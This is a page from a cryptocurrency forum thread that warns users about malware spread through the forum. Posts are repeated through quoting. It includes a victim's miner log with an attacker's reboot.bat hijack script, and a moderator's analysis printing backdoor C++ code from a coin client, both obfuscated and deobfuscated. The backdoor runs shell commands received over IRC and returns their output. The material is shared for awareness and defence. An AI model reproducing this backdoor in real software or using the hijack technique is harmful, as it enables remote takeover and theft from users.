Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 41. (Read 843901 times)
April 18, 2017, 10:15:49 AM
This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.
April 16, 2017, 07:25:40 PM
Does the malware affects desktop/laptop computer only? Does it affects iPhone/iOS user?
April 14, 2017, 08:20:27 AM
My ethmining is being hijacked.
Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.
I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"
I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.
I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety? As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.
02:00:08:453 6f2c Remote management: file reboot.bat was downloaded
02:00:08:454 6f2c srv bs: 0
02:00:08:454 6f2c sent: 40
02:00:09:231 17d8 GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887 397c ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887 397c target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888 397c ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:
00:22
02:00:09:888 397c ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889 397c DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889 397c DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231 406c recv: 73
02:00:10:232 406c srv pck: 73
02:00:10:232 406c Remote management: file reboot.bat was uploaded
02:00:10:232 406c srv bs: 0
02:00:10:233 406c sent: 682
02:00:10:604 7608 recv: 51
xxxxxxxxxx
02:00:13:363 689c Remote management required restart
02:00:13:364 689c Rebooting
02:00:13:377 4630 srv bs: 0
02:00:13:377 4630 sent: 210
==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum
+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -
esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal
1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.
I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"
I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.
I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety? As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.
02:00:08:453 6f2c Remote management: file reboot.bat was downloaded
02:00:08:454 6f2c srv bs: 0
02:00:08:454 6f2c sent: 40
02:00:09:231 17d8 GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887 397c ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887 397c target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888 397c ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:
00:22
02:00:09:888 397c ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889 397c DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889 397c DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231 406c recv: 73
02:00:10:232 406c srv pck: 73
02:00:10:232 406c Remote management: file reboot.bat was uploaded
02:00:10:232 406c srv bs: 0
02:00:10:233 406c sent: 682
02:00:10:604 7608 recv: 51
xxxxxxxxxx
02:00:13:363 689c Remote management required restart
02:00:13:364 689c Rebooting
02:00:13:377 4630 srv bs: 0
02:00:13:377 4630 sent: 210
==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum
+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -
esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal
1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
April 13, 2017, 07:09:46 PM
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.
You know it.. and so did "Satoshi"..
He/ they are cryptoFIAT banking on it. (pun intended)
April 06, 2017, 04:31:22 AM
I recommend using Linux for any PC running a full node, Linux is much more secure than windows.
The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.
Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.
For extra security Trezor and Ledger Nano S are the best.
Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.
I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.
Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.
For extra security Trezor and Ledger Nano S are the best.
Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.
I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
April 02, 2017, 07:25:47 AM
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.
April 02, 2017, 02:40:35 AM
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
March 29, 2017, 11:54:18 AM
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
We need to be vigilant in all our actions. We should look to the link above the browser everytime we are opening it. Hackers may hack our account by making us fool. Sometimes they are creating websites that are like be the same like the legit ones , just look to the link very carefully to avoid problems.
March 15, 2017, 10:06:53 AM
Thanks for sharing! I've added some of these malicious sites to CoinJabber.com a place for users to rate and review cryptocurrency sites...Basically yelp for Crypto
https://www.coinjabber.com/
https://www.coinjabber.com/
March 09, 2017, 07:42:46 PM
Does this include the malware I've seen that changes any bitcoin address you copy to your clipboard to an unsavory characters bitcoin address. When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice!
March 04, 2017, 06:14:43 AM
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself :
Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.
Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.
February 27, 2017, 09:00:41 AM
formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.
if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.
whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.
whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
February 27, 2017, 08:47:25 AM
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself :
Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.
Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
February 27, 2017, 02:16:25 AM
THANK YOU FOR THE INFORMATION MY FRIEND 
February 25, 2017, 01:55:19 PM
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself :
Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.
Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
February 24, 2017, 01:29:58 AM
Thank you .. I think it is very good information for me as a beginner. I will always support you.
February 22, 2017, 01:32:40 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
thanks for informing us,however we must know how to avoid this. we all give importance to bitcoin,therfore we must take care of it. there are some kind of people that wants to earn bitcoin without giving some effort on it,they just want to take it to others easily. secure your browsers , dont click anything that is not important ,look may be deceiving brothers.
February 15, 2017, 02:16:09 PM
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place.
avoid win 10
if u use 7, 8, or 8.1, remove or do not install the microsoft spyware
even better, use mac or linux
there is freeware available to do all this
February 15, 2017, 01:35:08 PM
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
February 11, 2017, 06:44:10 PM
is there any good anti virus to handle it??
I would like to ask this same question here. Can anyone site a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.
Jump to: